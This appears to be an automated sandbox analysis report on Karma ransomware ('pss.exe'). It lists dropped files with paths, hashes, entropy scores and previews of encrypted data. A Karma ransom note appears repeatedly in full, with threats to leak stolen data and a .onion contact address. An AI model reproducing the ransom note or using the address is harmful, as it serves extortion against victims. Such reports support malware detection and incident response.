Preview: o.......W.D@j......l.\..Qn....s.F.0.8.*'O*..d|N......... W...KARMA!U.....Kh.+.x"...B...P...h.q..8...'..Qz....`J...M$R..u..%I......(.....-.w.`.....J.mam....P=.&.}.z.U..(...{.......8...;.y.../.. ?v..K._.......K..j....~_L...o.....r.;.b.....".e .0..R'..T-.....|i................0.e.2{+z..1.k'...O...8....P.XQ........S..A.2z.Z.^@..v...}*.i<..#.Kl............"X..N.....T....T..o.2..V..O.].......N....'7y..Ehkx..|.M..f..hCM..1"...].....O....Z..<...L.g...."p.....HJ..,.1#?....p_-C.J..:.7....e..<CP..&......0.B0..z.....I..+.8.....F...n...!...(.Q..;...L].d.=.#..G.4(.-...........I..H\e8. ....\.9K#uC.TB.S<.Q.K$.)?..@.~I....U=.\......-R.7.Lt......_....?C.[W..fa9yt2.L../K.m..lu.s.q.VF..m.@.8.....+...1>.q.C.N...D......f.U........G..k....F./.XrH....d^...+p.....+.b.qK...$..;..v. ...\..H.d...DH,...u..!.w....]..|U..D..E....m.4..tX..-X.$#..K...(.@.F*..&..H=.<.W..f.@.P%uHw.!..\....G.D...D.U\=-..YD4?:.zU..z.._Z...2b.6S..b9.......q.ll...4w.eh..2dr....... _)W..J|.L...{.
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):344731
Entropy (8bit):7.999504743812455
Encrypted:true
SSDEEP:6144:4XggeaS8zt2bzAjXsbs1oVKSyBLhTBBllJ/aBb/0p0+96DNXmIzRcf+UNBT:kgglzt2X6XwKp7laBb/l+4NlRUX
MD5:073928B9EE8C475907DD05DE23E3DD95
SHA1:340A730BA037B34AFD46E1EC6A008A861CED5B09
SHA-256:2B8D7FA489C81E5D1B8C81CC48274A2A1722216EB933406EEB3A27764A9A4473
SHA-512:1C3FF810C553372CEA4BC451F808EAC65AD554B9257E05E746D953318C135702845D0B12836A48C8617ADC63ED134A0D77DE2A538E61BFACFF571E3B6C946969
Malicious:true
Preview: .G}5G?........k.J.bJ...9.b....Z]..3......`Jig.)&-...k.-.U....KARMAg.......UZ../P.B..)...".k.e.o4{...GO..-Z...".%C......<..TV........].......Z.w..o[r..M4oL[....#.v...h`AR.#n.~.:....N.J....N.a.D.t.G.K...cwIp...t[...%.t.NA.......O.....+.F.v...q[b...5....Lo..+..eV.L.f..(X0...B.[...@..{.EP...[....:6M.[....0QrJ..`.4dG..h..=...F4...c..d....0.~M..M.A.)FV.O.......H&/t.........o....j.K.).^.n2>.S[.<.v...7....S...o..{..p.}.-9..U.d.4........@J.cv...."pY.QF........Ig.zw..>...EeC.w..M. .7.z.1.XD..........._...n..-...u1N....\. .mm1#.B..-../_.`fe..KK....$.w_..\.!.N>d.I.....W{.?".i..%...........o..1....D..g...Q.-.....i.|u..W1..`....|Y..5...!Od.d.[....".I...........t.0..U.d.r......f.DTtc5..=..dO4......\....w.K1$SU!.Mh...Q.( ..f.......F.,0E....&.q......bf..f.D+.Uy.....m...k.....Am,U.H.t..[.rkH.....A..l..Y.bQ..;..Y.u...A.W.*...Z..O0+.....s.g...e.f..NFA..`^..Xk....75.zD.j....."8.E....X...D|..I....Cq...?....M......'...[.n...=L......dH.....&...7..7..$.....
C:\Users\user\AppData\Roaming\Microsoft\Credentials\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1920069
Entropy (8bit):7.999912641515446
Encrypted:true
SSDEEP:49152:a8aM9kUFuvwabpj/T7YEpY97v4r1KYvUG/Cnb8UxaGkADDplvh:TaMWU4xiGY97K1KYdCj1k8Dvh
MD5:89C9E5FEC59D85C85888509692A0E8D1
SHA1:ED4F82C892E2A0DA76E3217D9CCBB538097B2801
SHA-256:F16457DC290B18CD8D50BA5770C3EF06DF4FD4BADD123434D0E73A10E091A4E9
SHA-512:D34454DB464E9CCE9247F2177BDA1677AEF3DF4021CF9AD0C89D66EC20C30F7B14B13D3CF8D3FACD6F99637B0472A58F866222178A4023F91B175436F5B3E351
Malicious:true
Preview: . A z...$T"...m.l..Um+.|.........#3.4Y...^D.....l..6..c.k...b...KARMA.b.x.O4..0...a.L}.jc...l..xQ~......*g3-<;g\.:.)*.j........O.f../k.y.=.*d...Kh.R..A..d&..r.g>Q.....]E.v.@7..;..Z....~....D:.A(.{....C...$.~..|.V..X..O..((.........\..>q..}.c..9..C..1..3i..d...4s.4.=...N.Z.*..h.f.^O......L.+..D.V.4.?....2.G.T..X...l...{.T./........Gd.7......mFL.._.!F2....$R.....q............2H..'.....E....jR*D0K.......Ft.Or.e.{.=K{......!X N..1.^....B.....b...........;.r...P...r.........3.1....M...e...../.=...~}..O6^t....&.'......)...5..%(.rvb.\.....O.R"S..H..uO..&P.%5].5._..0.'..H.:..&.......%...#d3.b..E...:7.$....[.......W.....K..`.{...=.d.K...(Q$../.Q...n.....P.?..n.-)..h..)....P..Q.9.l<2...i.'...R.....;..!.}<!.oN.2..`[..._.K6....x^^?.w..)....dId....z..=...hH.~...D...,...Hb=....-...]i.l...$']Pi...*..B.7..bS..w.B-y...i..T^;..6..\.eE*....8....~!.%..Q....3e..>.l../.....B.<.L.TW./:..hm....e....W.;.(C...o[-.v.....I..I....g...Q.....W..E.G.}.......i.....r.
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Excel\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\MMC\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\MMC\services
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):92941
Entropy (8bit):7.997884392291508
Encrypted:true
SSDEEP:1536:Z3vYRNyYQSYwWEM3eLlLfHkZhP97e1YAZsaCgzRy4ThhXDDMBUtFKTJsSnvW5U+Q:NvMyYhZUuRfH47SjySjMS/eWmvWgsU
MD5:796271D8990E9EFE2EE327F5D04EBC2E
SHA1:B683D6689435C8E77C38DA62646AB1FEE2DE694A
SHA-256:DF90E4DAEBC045DEDB4F7B6E5A1F4F609E4BF79D80E17CC922A169BEF43DB66C
SHA-512:35B82066EA52B9A56EDEDBBD617308A51FF0B398DD380B171E123859B8C7B23882F8835187D49242EC1DB6C69699080DAA7BDEBD54A9517EF8D23663B7332B13
Malicious:true
